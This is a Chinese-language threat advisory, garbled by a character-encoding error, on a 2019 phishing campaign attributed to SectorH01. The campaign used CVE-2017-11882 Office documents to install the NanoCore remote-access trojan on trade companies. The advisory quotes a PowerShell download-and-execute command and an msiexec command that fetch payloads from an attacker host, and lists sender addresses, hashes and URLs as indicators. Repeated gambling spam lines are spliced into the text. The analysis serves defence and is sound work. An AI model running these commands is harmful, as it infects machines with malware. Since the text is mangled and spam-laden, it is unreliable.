SectorH01¹¥»÷×éÖ¯´¹ÂÚÓʼþÊÂÎñÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-09-22

ÊÂÎñÅä¾°



½üÆÚ¼ì²âµ½SectorH01¹¥»÷×éÖ¯¡°ÉÌóÐÅ¡±´¹ÂÚÓʼþ¹¥»÷ÔÚ9Ô·ºÆðÐÂÒ»ÂÖÔöÌí ¡£Ôڴ˴ι¥»÷ÖÐ £¬ºÚ¿ÍÈ«ÐĽṹµÄ´øÓÐoffice¹«Ê½±à¼­Æ÷Îó²îCVE-2017-11882»òºê´úÂëµÄ¶ñÒâÎĵµ £¬½«Æä×÷Ϊ¸½¼þÅúÁ¿·¢ËÍÖÁÍâóÐÐÒµÆóÒµÓÊÏäÖÐ £¬ÔÚÆä·­¿ªÎĵµÖÐÕкóÖ²ÈëÔ¶¿ØÄ¾ÂíNanoCore¾ÙÐÐÉñÃØÐÅÏ¢ÇÔÈ¡ºÍÔ¶³Ì¿ØÖÆ £¬±¾´Î¹¥»÷á¯ÁëʱÆÚÌìÌìÀÖ³ÉͶµÝ³¬3000¸öÓʼþµØÖ· ¡£



ÊÂÎñÐÎò



ͨ¹ýËÝÔ´ÆÊÎö £¬ÎÒÃÇ·¢Ã÷ºÚ¿ÍÒÉËÆÊ¹ÓÃÒ»¿îÃûΪ¡°****ÓʼþȺ·¢Æ÷¡±µÄÈí¼þ¾ÙÐÐÓÊÏ䵨ַÊÕÂÞºÍÓʼþÅúÁ¿Í¶µÝ ¡£¾Ý²âËã £¬¸ÃÈí¼þ¾ßÓÐ5000¸ö/СʱµÄÓÊÏ䵨ַÊÕÂÞÄÜÁ¦ £¬²¢ÇÒÔÚ·¢¼þʱ¿ÉÒÔ×Ô¶¯Ìæ»»´úÀíIP £¬Òѱ»ºÚ¿ÍʹÓÃÓÚÕë¶Ô¶ÔÍâóÆóÒµµÄ¡°×Ô¶¯»¯¡±¹¥»÷ ¡£²¿·ÖÊܹ¥»÷ÆóÒµÈçÏ£º


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


ƾ֤ͳ¼ÆÊý¾Ý £¬ÓÐÁè¼Ý1000¼ÒÆóÒµÊܵ½´Ë´Î¹¥»÷Ó°Ïì £¬ÆäÖнüÒ»°ëÒÔÉÏÂþÑÜÔڹ㶫¡¢½­ËÕ¡¢Õã½­ºÍÉϺ£ËĵØ £¬ÆäÖй㶫ռ±ÈÁè¼Ý30% ¡£ÌØÊâÊǹ㶫ÉîÛںͶ«Ý¸ÓÉÓÚÖÆÔìÒµºÍÍâóÐÐÒµ÷缯 £¬³ÉΪ±¾´Î¹¥»÷Êܺ¦×îÑÏÖØµÄÇøÓò ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!

 
´ÓÐÐÒµÂþÑÜÀ´¿´ £¬¡°ÉÌóÐÅ¡±¹¥»÷Ä¿µÄÖ÷Òª¼¯ÖÐÔÚ¹¤ÒµÖÆÔì¼°ÉÌÒµÐÐÒµ ¡£Í³¼ÆÊý¾ÝÏÔʾ £¬±»¹¥»÷µÄ88%ÎªÖÆÔìÒµ £¬Ê£Óà12%ÊÇÓëÖÆÔìÒµÌṩÏà¹ØÁªµÄÏúÊÛ¡¢ÔËÊä¡¢ÉÌÎñ·þÎñÐÐÒµ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!



ÊÂÎñÆÊÎö



´¹ÂÚÓʼþÖ÷Ҫͨ¹ýαÔìÒÔÏ·¢¼þÓÊÏä¾ÙÐз¢ËÍ £¬ÆäÖÐʹÓÃ×î¶àµÄΪ


kieth@sdgtrading.co.uk
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


ÒÔÆäÖÐÒ»·âÓʼþΪÀý £¬´ÓÓʼþÍ·²¿ÐÅÏ¢ÖпÉÒÔ¿´µ½·¢¼þÈËΪ¡°Keith Ward/SDG /UK¡± £¬·¢¼þÓÊÏäµØÖ·Îªkieth@sdgtrading.co.uk ¡£sdgtradingÊÇÒ»¼Ò×ܲ¿Î»ÓÚÓ¢¹úµÄÊÕÖ§¿ÚÉÌÒµ¹«Ë¾ £¬ÏÖÔÚ·­¿ª¸Ã¹«Ë¾¹Ù·½ÍøÕ¾¿ÉÒÔÕý³£»á¼û ¡£


·­¿ªÍøÕ¾µÄcontact-usÒ³ÃæÎÒÃÇ·¢Ã÷ÓÐÒ»¸öÖ°ÎñΪUK & European Sales(Ó¢¹ú¼°Å·ÖÞµØÇøÏúÊÛ)µÄÖ°Ô±ÁªÏµ·½·¨Îªkeith@sdgtrading.co.uk £¬¶øÕâÕýÊÇ´¹ÂÚÓʼþ·¢¼þÓÊÏä(ÓÐÁ½¸ö×ÖĸλÖý»Á÷) ¡£ÎÒÃÇÍÆ²â¹¥»÷Õß¿ÉÄÜͨ¹ýÅÀÈ¡»òÕßÈ˹¤ËѼ¯µÄ·½·¨»ñÈ¡Á˸ÃÉÌÒµ¹«Ë¾µÄÓʼþµØÖ· £¬È»ºóαװ³É¸Ã¹«Ë¾µÄÏúÊÛÖ°Ô±·¢ËÍ´¹ÂÚÓʼþ¾ÙÐй¥»÷ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


´¹ÂÚÓʼþ·¢¼þÈËÐÅÏ¢


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


ÉÌÒµ¹«Ë¾ÏúÊÛÖ°Ô±ÐÅÏ¢



´¹ÂÚÓʼþ


ÓʼþÄÚÈÝÊǹØÓÚÉÌÒµ¶©µ¥È·ÈϺͼÛÇ®×Éѯ ¡£Óʼþ±íÊöÖÐ¸ßÆµ·ºÆð·ºÆðÒÔÏÂÎľ䣺
¡°¶©¹º¡±¡¢¡°¼ÛÇ®¡±¡¢¡°¼ÛÄ¿±í¡±¡¢¡°ÏúÊÛÌõ¼þ¡±¡¢¡°ÕÛ¿Û¡±¡¢¡°×°ÔËÈÕÆÚ¡±¡¢¡°²É¹º¹æ¸ñ¡±µÈ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


ÓʼþÖл¹Ö¸³öÓʼþ¸½¼þÖаüÀ¨¡°ÏëÒª²É¹ºµÄ²úÆ·ÌõÄ¿¡±Îĵµ £¬ÇëÔĶÁºó¾ÙÐлظ´ £¬²¿·ÖÎĵµÃûÈçÏ£º


RFQ0591403-SDG.doc

RFQ015770082.doc


ÆÊÎö·¢Ã÷ £¬¸½¼þÎĵµÖаüÀ¨Office¹«Ê½±à¼­Æ÷Îó²îCVE-2017-11882ʹÓôúÂë»ò¶ñÒâºê´úÂë £¬¾­ÓÉÎó²î¹¥»÷»òºê´úÂëÖ´ÐÐÀú³Ì £¬»á´¥·¢ÓÃÓÚÏÂÔØÄ¾ÂíµÄPowershellÏÂÁîÖ´ÐÐ £¬½øÒ»²½ÏÂÔØÄ¾Âí£º


'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'


³ýÁËʹÓÃPowershell £¬ÉÐÓв¿·Ö¹¥»÷ÖÐʹÓÃWindows×°ÖóÌÐò(msiexec.exe)×°ÖÃMSI°üÎļþ¾ÙÐÐľÂíÏÂÔØ£º


msiEXEc  /i http[:]//oppofile.duckdns.org/d/dar.msi


´ÓÏÖÔÚ²¶»ñµ½µÄ¹¥»÷ÎĵµÖÐÎÒÃÇ·¢Ã÷ÓÐÒÔÏÂľÂíÏÂÔØµØÖ·£º


hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi


Ô¶¿ØÄ¾Âí


±»ÏÂÔØÖ²ÈëµÄÏÖʵÉÏÊǵľ­ÓÉ»ìÏýµÄÔ¶¿ØÄ¾ÂíNanoCore £¬NanoCoreÊÇʹÓÃ.NetÓïÑÔ±àдµÄ¹¦Ð§Ç¿Ê¢µÄÔ¶³Ì»á¼û¿ØÖÆÄ¾Âí£¨RAT£© £¬¿ÉÒÔÔÚÄ¿µÄÖ÷»úÉϾÙÐÐÎļþ²Ù×÷ £¬ÆÁÄ»¿ØÖÆ £¬ÔËÐÐÖ¸¶¨³ÌÐò £¬»¹Ö§³Ö²å¼þÀ©Õ¹¹¦Ð§ £¬±»Ñ¬È¾NanoCoreľÂíµÄµçÄԻ᷺ÆðÑÏÖØÐÅϢй¶ £¬¹¥»÷Õß»¹¿ÉÒÔʹÓÃÖж¾µçÄÔÎªÌø°å £¬¶ÔÄ¿µÄÍøÂç¼ÌÐø¾ÙÐÐÉøÍ¸ÈëÇÖ ¡£


½¹µãÄ£¿é±»¼ÓÃܺóÒÔλͼÃûÌÃÉúÑÄÔÚ×ÊÔ´Îļþ


¡°tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt¡±ÖÐ


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


´Ó×ÊÔ´ÖлñÈ¡µ½Êý¾Ýºó £¬¾­Óɶà´Î½âÃÜ»ñµÃ×îÖÕµÄPEÎļþ £¬È»ºó½«ÆäLoadµ½ÄÚ´æ £¬²¢Ìø×ªµ½Èë¿ÚλÖÃÖ´ÐÐ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


×îÖÕÖ´ÐеÄNanoCoreľÂí¹¦Ð§Ç¿Ê¢ £¬¿ÉÖ´ÐÐÖÖÖÖ¶ñÒâ²Ù×÷ £¬ÈçÎļþ²Ù×÷ £¬×¢²á±í±à¼­ £¬Àú³Ì¿ØÖÆ £¬Îļþ´«Êä £¬Ô¶³ÌÏÂÁîÖ´ÐÐ £¬¼üÅ̼ͼµÈ ¡£ÒÔÏÂΪ¸ÃľÂí¿ØÖÆ¶Ë½çÃæ£º


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


Ⱥ·¢Èí¼þ


ͨ¹ýÅŲé £¬·¢Ã÷ÁËÒ»¸öÃûΪ¡°***\ÓʼþȺ·¢Æ÷.exe¡±µÄ¿ÉÒɳÌÐò £¬Ê¹ÓøÿÉÒÉÎļþÃûÖеġ°***ÓʼþȺ·¢Æ÷¡±Òªº¦×Ö¾ÙÐÐËÑË÷ £¬·¢Ã÷ÁËÕâ¿îÃûΪ****µÄÓʼþȺ·¢Æ÷Èí¼þ ¡£¸ÃÈí¼þ¾ßÓдÓÍøÂçÉÏÅúÁ¿ÅÀÈ¡ÓÊÏ䵨ַ £¬²¢Õë¶Ô»ñµÃµÄÓÊÏä¾ÙÐÐÅúÁ¿·¢ËÍÖ¸¶¨ÓʼþµÄ¹¦Ð§ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


ÎÒÃÇÏÂÔØ¸ÃÈí¼þ £¬²¢¾ÙÐÐ×¢²áºÍÊÔÓà ¡£Æ¾Ö¤Æä½çÃæÕ¹Ê¾µÄ¹¦Ð§ £¬Ö»Ðè±àдºÃÓʼþÄÚÈÝ(í§ÒâÌîд·¢¼þÈËÐÕÃû)¡¢ÅúÁ¿Ìí¼ÓÊÕ¼þÈ˵ØÖ·¡¢µã»÷¡°×îÏÈȺ·¢¡±Èý²½ £¬¼´¿É½«Óʼþ¿ìËÙ·¢ËÍÖÁ´óÅúµÄÄ¿µÄÓÊÏäÖÐ ¡£


¸ÃÈí¼þ»¹Ö§³ÖÉó²éȺ·¢Ð§¹û £¬ÈôÊÇÓз¢ËÍʧ°ÜµÄÇéÐÎ £¬¿ÉÒÔÒ»¼üÖØ·¢ ¡£·¢ËÍʱ»¹¿ÉÒÔÑ¡Ôñ×Ô¶¯Ìæ»»´úÀíIP £¬ÕâÔÚÒ»¶¨Ë®Æ½ÉÏ¿ÉÒÔÒþ²ØÕæÊµ·¢¼þIP ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


¸ÃÈí¼þÉÐÓÐÒ»¸öÖ÷ÒªµÄ¹¦Ð§ÊÇ £¬Ö§³Ö´ÓÖ¸¶¨ÍøÕ¾ÊÕÂÞÄ¿µÄÓÊÏä ¡£¸Ã¹¦Ð§Ò³ÃæÄ¬ÈϵÄÔ´ÍøÕ¾µØÖ·Îªhttp[:]//www.****.biz/ ¡£ÎÒÃÇʵÑéʹÓøÃÍøÕ¾¾ÙÐÐÓÊÏäÊÕÂÞ £¬ÔÚ10·ÖÖÓÖ®ÄÚ¿ÉÒÔÊÕÂÞµ½½ü800¸öÓÊÏ䵨ַ £¬»»ËãºóÒ»¸öСʱ֮ÄÚ¿ÉÒÔÊÕÂÞµ½5000¸öÓÊÏä £¬¶øÕâЩ±»ÊÕÂÞµ½µÄÓÊÏä¶¼±£´æ±»¹¥»÷µÄ¿ÉÄÜ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!

 

¿ÉÒÔ¿´µ½Õâ¸öĬÈϵÄÓÊÏäÊÕÂÞÍøÕ¾¡°**Íø¡±(www.*****.biz)ÊÇÒ»¸öÉÌÒµÐÅÏ¢Ðû²¼Æ½Ì¨ £¬´ó×Ú³§ÉÌ(»úе¡¢»¯¹¤¡¢µçÆø¡¢ÄÜÔ´¡¢ÒÇÆ÷µÈÐÐÒµ)ÔÚ¸ÃÍøÕ¾ÉÏÐû²¼µÈÖݪֲúÆ·µÄ¹©Ó¦»òÇó¹ºÐÅÏ¢ ¡£¶øÃ¿Ò»ÌõÐÅÏ¢¶¼»á¸½´ø³§É̵ĵ绰¡¢ÓʱࡢÓÊÏäµÈÁªÏµ·½·¨ £¬¡°****ÓʼþȺ·¢Æ÷¡±ÕýÊÇ´ÓÕâЩÐÅÏ¢ÖлñÈ¡ÁË´ó×ÚµÄÓÊÏ䵨ַ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


¹¥»÷˼Ð÷


´ÓÒÔϼ¸¸ö½Ç¶È £¬ÎÒÃÇÒÔΪºÚ¿ÍʹÓÃÁËÓʼþȺ·¢Èí¼þ¡°****ÓʼþȺ·¢Æ÷¡±¾ÙÐи¨Öú¹¥»÷£º


1¡¢Èº·¢Èí¼þ¡°****¡±ÓнüÆÚ»á¼û·¢¼þÈËIPµÄ¼Í¼£»
2¡¢Êܺ¦ÆóÒµÀàÐÍÓë¡°****ÓʼþȺ·¢Æ÷¡±Ä¬ÈÏÊÕÂÞÓÊÏäÀàÐÍÒ»ÖÂ(¹¤ÒµÆ·ÉÌÒµ¹«Ë¾)£»
3¡¢¹¥»÷µÄÓ°Ïì¹æÄ£Óë¸ÃÈí¼þµÄÊÕÂÞÄÜÁ¦ÎǺÏ(Êܺ¦ÓÊÏäÔ¼3000¸ö/ÈÕ & Èí¼þµÄÊÕÂÞÄÜÁ¦Ô¼5000¸ö/Сʱ) ¡£
ÍÆ²âºÚ¿ÍʵÑé¹¥»÷µÄ˼Ð÷ÈçÏ£º
1¡¢ºÚ¿ÍÏÂÔØÓʼþȺ·¢Èí¼þ£»
2¡¢½á¹¹´øÓÐCVE-2017-11882Îó²îʹÓÃ(»òÕߺê´úÂë)µÄoffice¶ñÒâÎļþ£»
3¡¢Ê¹ÓÃ****ÓʼþȺ·¢Æ÷´ÓÉÌÒµ·ÖÀàÐÅÏ¢ÍøÕ¾ÅúÁ¿ÊÕÂÞÄ¿µÄÓÊÏ䵨ַ£»
4¡¢Ê¹ÓÃ×¼±¸ºÃµÄ¶ñÒâÎĵµ×÷Ϊ¸½¼þ £¬½á¹¹´¹ÂÚÓʼþ²¢ÅúÁ¿·¢ËÍ£»
5¡¢ÆÚ´ýÊÕ¼þÈË·­¿ª¸½¼þ²¢ÖÐÕÐ £¬Í¨¹ýÔ¶¿ØÄ¾ÂíNanoCore¶ÔÄ¿µÄ¾ÙÐÐÔ¶³Ì¿ØÖÆ ¡£


×ðÁú¿­Ê± - ÈËÉú¾ÍÊDz«!


×ܽá


Ôڴ˴ι¥»÷ÊÂÎñÖпÉÒÔ·¢Ã÷ £¬ºÚ¿ÍÓë»Ò²ú´ÓÒµÖ°Ô±·ºÆðÁ˽»¼¯ ¡£»Ò²úÖ°Ô±¿ª·¢³öÓʼþȺ·¢¹¤¾ß £¬¹¤¾ß¿ÉÕë¶ÔÍøÕ¾ÉϵĹûÕæÓÊÏä¾ÙÐÐÅÀÈ¡ £¬¿ÉʹÓûñÈ¡µ½µÄÓÊÏä¾ÙÐÐÅúÁ¿Èº·¢Óʼþ ¡£¹¤¾ßÔÚÆä×¢²áµÄ¡°¹ÙÍø¡±ÉϾÙÐйûÕæÊÛÂô £¬Ê¹ÓÃ˵Ã÷ÖС°ÕýÒ塱µØÌáµ½¡°½öÓÃÓÚÕý¹æÓʼþÓªÏú £¬ÀÄÓÃÕßЧ¹û×Ô×𡱠¡£µ«¹¤¾ßÒ»µ©ÊÛ³ö £¬±ãÄÑÒÔ°ü¹Ü±»ÓÃÓÚÕýµ±ÓÃ; ¡£


¶øºÚ¿Í»ñµÃ´ËÈí¼þºó £¬½«ÆäÄÉÈë¹¥»÷ÎäÆ÷ÖеÄÒ»Ô± ¡£Ëæºó £¬Ö»Ðè±àдºÃľÂí £¬½á¹¹´¹ÂÚÓʼþ £¬¾Í¿ÉÒÔʹÓøù¤¾ß½«´¹ÂÚÓʼþ×Ô¶¯»¯¡¢´óÅúÁ¿µØ·¢ËÍÖÁÆóÒµµÄÏà¹ØÓÊÏäÖÐ ¡£



ÐÞ¸´½¨Òé



1¡¢ÆóÒµÓÊÏäÍø¹Ü½«ÒÔÏ·¢¼þÓÊÏäÉèÖÃΪºÚÃûµ¥


kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


2¡¢²»Òª·­¿ª²»Ã÷ȪԴµÄÓʼþ¸½¼þ £¬¹ØÓÚ¸½¼þÖеÄÎļþÒªÉóÉ÷ÔËÐÐ £¬Èç·¢Ã÷Óо籾»òÆäËû¿ÉÖ´ÐÐÎļþ¿ÉÏÈʹÓÃɱ¶¾Èí¼þ¾ÙÐÐɨÃ裻


3¡¢Éý¼¶officeϵÁÐÈí¼þµ½×îа汾 £¬ÊµÊ±ÐÞ¸´office³ÌÐòÎó²î £¬²»ÒªËæÒâÔËÐв»¿ÉÐÅÎĵµÖеĺꣻ


4¡¢ÍƼö°²ÅÅÖÕ¶ËÇå¾²¹ÜÀíϵͳ·ÀÓù²¡¶¾Ä¾Âí¹¥»÷£»


5¡¢Ê¹ÓÃÈëÇÖ¼ì²âϵͳ¼ì²âδ֪ºÚ¿ÍµÄÖÖÖÖ¿ÉÒɹ¥»÷ÐÐΪ ¡£



IOC


ÓÊÏä


kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


Óʼþ¸½¼þ


fec34e9741abedea7f0a4fa991bdc618
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905

a9958884c16f17c2c9e4d75f92117352


NanaCoreľÂí


2c7885159feae6ebde634418591ad276

453a235ad5ea7055f2af2c51c95a5bb2


ÓòÃû


oppofile.duckdns.org


URL


hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi



²Î¿¼Á´½Ó



https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/